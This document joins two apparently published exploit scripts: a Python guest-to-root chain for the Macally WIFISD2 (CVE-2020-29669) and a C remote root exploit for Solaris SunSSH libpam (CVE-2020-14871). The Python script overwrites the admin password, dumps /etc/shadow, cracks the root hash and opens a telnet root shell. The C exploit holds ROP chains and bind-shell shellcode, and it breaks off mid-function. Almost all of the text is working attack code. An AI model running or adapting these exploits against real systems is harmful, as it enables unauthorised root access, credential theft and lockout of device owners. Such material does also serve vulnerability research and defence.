banner = '''\033[94m ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ ░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░ ▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \x1b[0m Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner '''


def main() -> None:
    """Entry point: `<host>` from argv[1].

    Chain: authenticate as guest over HTTP, reset the admin password from the
    guest session, log in over telnet as admin to dump /etc/shadow, then open
    an interactive root telnet shell.

    Destructive: the device's admin password is overwritten with
    admin_pass_to_set. Everything travels over plain HTTP and telnet.
    `re` is imported but unused.
    """
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg: %s 1.2.3.4 " % sys.argv[0])
        return
    rhost = sys.argv[1]
    session = requests.Session()
    # "guest_pass" is presumably the device's default guest password - confirm.
    guest_creds = "guest_pass"
    admin_pass_to_set = "Silky123"

    def send_requests() -> None:
        """Step 1: guest login (opt=pwdchk); step 2: admin password change
        (opt=pwdmod) using the same guest session - evidently the device does
        not check that the caller is admin. Success is an <errno>0</errno>
        body; on any failure the process exits.

        NOTE(review): Session.post's third positional argument is `json`, not
        `headers`, so these header dicts are most likely never sent (requests
        ignores json when data is given). Pass headers=headers if they matter;
        the hard-coded Content-Length values would then have to stay in sync
        with the form bodies.
        """
        url = "http://"+rhost+"/protocol.csp?function=set"
        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
        headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/index.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '65', 'Connection': 'close', 'Cache-Control': 'no-cache', }
        r= session.post(url, payload, headers)
        if (b"<errno>0</errno>" in r.content):
            print("\033[92m[+] Authentication successful\x1b[0m")
            print("\t"+str(session.cookies.get_dict()))
        else:
            print("\033[91m[+] Authentication failed.\x1b[0m")
            sys.exit()
        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
        headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/app/user/guest.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '49', 'Connection': 'close', 'Cache-Control': 'no-cache', }
        d = session.post(url, payload, headers)
        if (b"<errno>0</errno>" in d.content):
            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
            telnet_grep_root_hash()
            #print("[+] Spawning Admin Shell")
            #telnet_login()
        else:
            print("\033[91m[+] Admin Password change failed\x1b[0m")
            sys.exit()

    def telnet_grep_root_hash() -> None:
        """Telnet in as admin with the new password, `cat /etc/shadow`, print
        every line containing ':', then write the first line containing the
        substring "root" to ./root_hash and hand it to crack_root_hash().

        Note: the loop variable shadows the builtin `hash`, and "root" in hash
        is a substring test, so any shadow line containing "root" matches.
        """
        user = "admin"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
        print("\033[92m[+] Dumping Hashes:\x1b[0m")
        tn.write(b"cat /etc/shadow\n\r")
        tn.write(b"exit\n")
        output = tn.read_all().decode('ascii')
        L = output.split('\n')
        for hash in L:
            if ":" in hash:
                print("\t"+hash)
        print("\n\r")
        for hash in L:
            if "root" in hash:
                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
                print("\t"+hash)
                #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
                f = open("root_hash","w+")
                f.write(hash)
                f.close()
                crack_root_hash();

    def crack_root_hash() -> None:
        """Read ./root_hash; if it is the known firmware root hash, print the
        matching password and open the root shell. Otherwise run hashcat
        (md5crypt, mode 500) against a hard-coded routersploit wordlist path
        - that result is printed by hashcat only and never fed back into the
        script, so no shell is spawned in that branch.
        """
        f = open("root_hash", "r")
        hash = f.read()
        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
            print("\033[92mRoot Password: 20080826\x1b[0m\n")
            telnet_login()
        else:
            # NOTE(review): wordlist path is specific to the author's machine.
            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt")
            #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt

    def telnet_login() -> None:
        """Telnet in as root with the hard-coded firmware password and hand the
        terminal to the user (tn.interact() blocks until the session ends)."""
        print("\033[92m[+] Spawning Rootshell\x1b[0m")
        user = "root"
        root_password="20080826"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(root_password.encode('ascii') + b"\n")
        tn.interact()

    print(banner)
    send_requests()


if(__name__ == '__main__'):
    main()
-
Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root # Exploit Author: Hacker Fantastic # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html # Version: 11 # Tested on: SunOS solaris 5.11 11.0 /* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * ==================================================================== * Makefile * all: hfsunsshdx * * hfsunsshdx: main.c * gcc main.c -o hfsunsshdx -lssh2 * * clean: * rm -rf hfsunsshdx * rm -rf core.* * * A trivially reachable stack-based buffer overflow is present in libpam on * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() * which allocates a fixed size buffer of 512 bytes on the stack and parses * usernames into the buffer via modules (authtok_get) without bounds checks. * This issue can be reached remotely, pre-authentication, via SunSSH when * "keyboard-interactive" is enabled to use PAM based authentication. FireEye * discovered the vulnerability being actively exploited in the wild as part * of an APT toolkit called "EVILSUN". The vulnerability is present in both * SPARC/x86 versions of Solaris & others (e.g. illumos). This exploit uses * ROP gadgets to disable nxstack through mprotect on x86 and a helper * shellcode stub. The configuration in a default Solaris install is * vulnerable. The exploit makes use of libssh2 and was tested on Solaris 10 * through 11.0. Solaris 9 does not ship with a vulnerable SunSSH * implementation and versions later than 11.1 have updated SunSSH code that * prevents the issue being triggered. * * Caveats: the ROP chains are tied to the exact builds listed in targets[] * (-t), so a wrong target choice will most likely just crash the sshd child * (the final "debug crash target" entry exists for that); every shellcode is * a bind shell, so a successful run leaves an unauthenticated root shell * listening on the chosen TCP port (9999/8080/4444) until it exits. * * e.g. * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e * [+] entering keyboard-interactive authentication. 
* [-] number of prompts: 1 * [-] prompt 0 from server: 'Please enter user name: ' * [-] shellcode length 193 bytes * [-] rop chain length 68 * [-] exploit buffer length 580 * [-] sending exploit magic buffer... wait * [+] exploit success, handling payload... * [-] connected.. enjoy :) * SunOS solaris 5.11 11.0 i86pc i386 i86pc * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 * helpdesk console Nov 27 17:57 * uid=0(root) gid=0(root) * * -- Hacker Fantastic (https://hacker.house) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <ctype.h> #include <getopt.h> #include <time.h> #include <signal.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/select.h> #include <arpa/inet.h> #include <sys/time.h> #include <libssh2.h> int sd = -1; int oldsd = -1; int ishell = -1; char* buf; char* payload; char* retaddr; struct sockaddr_in sain; struct target { char* name; char* ropchain; }; struct shellcode { char* name; char* shellcode; }; void spawn_shell(int); void bindshell_setup(short); void on_alarm(int); void on_interupt(int); void prepare_payload(); const int targetno = 5; struct target targets[] = { {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", "\x41\x42\x43\x44" // %ebx "\x45\x46\x47\x48" // %esi "\x50\x51\x52\x53" // %ebp "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) "\x01\x01\x04\x08" // %edx unused, must be writeable addr "\x41\x42\x43\x44" // %ebp unused var "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg "\x1a\xe7\x0b\xfe" // dec %edx ; ret "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to shellcode "\xe0\xe8\x3e\xfe" // mov $0x72,%al "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x22\x9d\xd3\xfe"},// sysenter {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", 
"\x41\x42\x43\x44" // %ebx overwrite unused "\x41\x42\x43\x44" // %esi overwrite unused "\xf8\x32\x04\x08" // %ebp overwrite unused "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) "\x01\x30\x04\x08" // ptr for %edx "\x44\x43\x42\x41" // ptr for %ebp unused "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret "\xeb\x30\x04\x08" // shellcode ptr for %edx "\x1c\x33\x04\x08" // %ebp & used by "leave" "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret "\x41\x42\x43\x44" // %esi unused "\xe0\x30\x04\x08" // shellcode ptr to %ebx "\xe8\x32\x04\x08" // ptr into %ebp "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret "\xfe\xf8\xcf\xfe"},// sysenter {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\xb1\x26\x07\x08" // pop %ebx ; ret "\xff\x01\xac\xfe" // write garbage here, unused gadget 
"\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret "\xff\x2f\x04\x08" // %edx pointer to page "\xc3\x31\x04\x08" // unused %ebp value "\x57\xaa\xe4\xfe" // pop %ecx ; ret "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) "\xee\x6a\x65\xfe" // inc %edx ; ret "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\x86\xae\xe5\xfe" // pop %edx ; ret "\xc3\x31\x04\x08" // shellcode return address for %edx "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) {"Solaris all Sun_SSH_1.x.x debug crash target", "\x41\x42\x43\x43" // %ebp ptr "\x78\x79\x80\x81"} // %eip ptr }; const int shellno = 4; struct shellcode shellcodes[] = { {"Solaris x86 bindshell tcp port 9999", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); ================================================================== xorl %eax, %eax xorl %ecx, %ecx movl $0x08041001, %ebx movw $0x7001, %ax movb $0x7,%cl dec %ebx dec %eax pushl %ecx pushl %eax pushl %ebx pushl %ebx movl %esp, %ecx xorl %eax, %eax movb $0x74, %al int $0x91 */ /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" 
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x2a\x95"}, {"Solaris x86 bindshell tcp port 8080", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x44\x60"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 9999", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" 
"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" "\x9f\x56\x1b\x2c\xdf\x8f"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 4444", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" "\x0a\x39\x6b\xeb\x53\x6b"} }; void spawn_shell(int sd) { #define sockbuflen 2048 int rcv; char sockbuf[sockbuflen]; fd_set readfds; memset(sockbuf,0,sockbuflen); snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); write(sd,sockbuf,strlen(sockbuf)); while (1) { FD_ZERO(&readfds); FD_SET(0,&readfds); FD_SET(sd,&readfds); select(255,&readfds,NULL,NULL,NULL); if (FD_ISSET(sd, &readfds)) { memset(sockbuf,0,sockbuflen); rcv = read(sd,sockbuf,sockbuflen); if (rcv <= 0) { printf("\e[1m\e[34m[!] 
connection closed by foreign host.\n\e[0m"); exit(-1); } printf("%s",sockbuf); fflush(stdout); } if(FD_ISSET(0,&readfds)) { memset(sockbuf,0,sockbuflen); read(0,sockbuf,sockbuflen); write(sd,sockbuf,strlen(sockbuf)); } } } void bindshell_setup(short port){ oldsd = sd; sd = socket(AF_INET,SOCK_STREAM,0); sain.sin_port = htons(port); if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ printf("[!] fatal bind shell failed\n\e[0m"); exit(-1); } printf("[-] connected.. enjoy :)\e[0m\n"); spawn_shell(sd); } void on_alarm(int signum){ printf("[+] exploit success, handling payload...\n"); if(ishell==0||ishell==2){ bindshell_setup(9999); } if(ishell==1||ishell==3){ bindshell_setup(8080); } printf("[-] exploit complete\n\e[0m"); exit(0); } void on_interrupt(int signum){ printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); if(sd){ close(sd); } if(oldsd){ close(oldsd); } exit(0); } void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ #define payload_size 4096 int len = strlen(payload); buf = malloc(payload_size); char randchar = 'A'; char* randbuf = malloc(2); if(!buf||!randbuf){ printf("[!] fatal payload buffer error\n"); exit(-1); } srand(time(NULL)); memset(buf,'\x00',payload_size); memset(randbuf,0,2); printf("[-] shellcode length %d bytes\n",len); if(len < 512 && payload_size > 1024){ memcpy(buf,payload,len); for(int i =0;i <= (512 - len);i++){ randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; memcpy(randbuf,&randchar,1); strcat(buf,randbuf); } len = strlen(retaddr); printf("[-] rop chain length %d\n",len); if(len + 512 < payload_size){ memcpy((void*)(long)buf+512,(void*)retaddr,len); len = strlen(buf); printf("[-] exploit buffer length %d\n",len); } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } else{ printf("[!] 
exploit buffer miscalculated\n"); exit(-1); } } static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { int i = 0; signal(SIGALRM, &on_alarm); printf("[+] entering keyboard-interactive authentication.\n"); printf("[-] number of prompts: %d\n", num_prompts); printf("[-] prompt %d from server: '", i); fwrite(prompts[i].text, 1, prompts[i].length, stdout); printf("'\n"); prepare_payload(); //uncomment to pause for gdb debugging //sleep(10); responses[i].text = strdup(buf); responses[i].length = strlen(buf); printf("[-] sending exploit magic buffer... wait\n"); alarm(5); } int main(int argc,char **argv){ int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; char* host; int i, type, exitcode; unsigned long hostaddr; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; char *exitsignal = (char *)"none"; size_t len; LIBSSH2_KNOWNHOSTS *nh; static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 'x'}, {"help", 0, 0,'h'} }; printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); while(rc != -1) { rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); switch(rc) { case -1: break; case 's': if(ihost==0){ host = malloc(strlen(optarg) + 1); if(host){ sprintf(host,"%s",optarg); ihost = 1; } } break; case 'p': port = atoi(optarg); break; case 'x': if(ishell==-1) { rc = atoi(optarg); switch(rc){ case 0: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 1: printf("[-] using shellcode '%s' %d 
bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 2: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 3: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; default: printf("[!] Invalid shellcode selection %d\n",rc); exit(0); break; } } break; case 't': if(itarg==0){ rc = atoi(optarg); switch(rc){ case 0: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 1: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 2: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 3: printf("[-] chosen target 
'%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 4: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; default: printf("[!] Invalid target selection %d\n", rc); exit(0); break; } itarg = 1; } break; case 'h': printf("[!] Usage instructions.\n[\n"); printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]); printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n"); printf("[ --shellcode|-x <shellcode#>\n[\n"); printf("[ Target#'s\n"); for(i = 0;i <= targetno - 1;i++){ printf("[ %d \"%s\"\n",i,targets[i]); } printf("[\n[ Shellcode#'s\n"); for(i = 0;i <= shellno - 1;i++){ printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); } printf("\e[0m"); exit(0); break; default: break; } } if(itarg != 1 || ihost != 1 || ishell < 0){ printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); exit(-1); } rc = libssh2_init(0); hostaddr = inet_addr(host); sd = socket(AF_INET, SOCK_STREAM, 0); sain.sin_family = AF_INET; sain.sin_port = htons(port); sain.sin_addr.s_addr = hostaddr; if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "[!] failed to connect!\n"); goto shutdown; } session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); if(rc) { printf("[!] failure establishing ssh session: %d\n", rc); goto shutdown; } nh = libssh2_knownhost_init(session); if(!nh) { printf("[!] 
